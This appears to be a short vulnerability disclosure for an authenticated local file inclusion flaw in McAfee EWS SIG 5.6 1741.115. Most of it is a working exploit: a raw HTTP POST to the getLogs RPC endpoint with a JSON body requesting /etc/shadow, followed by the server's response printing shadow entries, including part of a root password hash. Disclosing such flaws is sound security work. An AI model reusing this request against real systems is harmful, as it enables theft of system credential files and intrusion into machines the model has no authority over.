McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerability Title: McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

The application is vulnerable to a local file inclusion vulnerability.

Exploit:

Request:

Request:
POST /scmadmin/29836/cgi-bin/rpc/getLogs/175 HTTP/1.1
Host: 10.10.10.113
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://10.10.10.113/scmadmin/29836/en_US/html/index.html
Content-Length: 42
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dtrouble_reports; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3AD911311E-E496-4807-800C-0790A40AF080
Pragma: no-cache
Cache-Control: no-cache

{"filename":"/etc/shadow","numlines":"25"}

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 02:06:19 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 549
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

[{"errorCode":"0","jobId":"175"},{"out":"daemon:*:11381:0:99999:7:::\nlp:*:11381:0:99999:7:::\nsync:*:11381:0:99999:7:::\nmail:*:11381:0:99999:7:::\nuucp:*:11381:0:99999:7:::\nnobody:*:11381:0:99999:7:::\nrpcuser:!!:11381:0:99999:7:::\nrpc:!!:11381:0:99999:7:::\nroot:$1$/DMw.tf8$43W……
….

Impact: Impact is low, due to the fact that they need valid credentials to be exploited.

Recommendation:

No response from MCAfee to the submission.

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.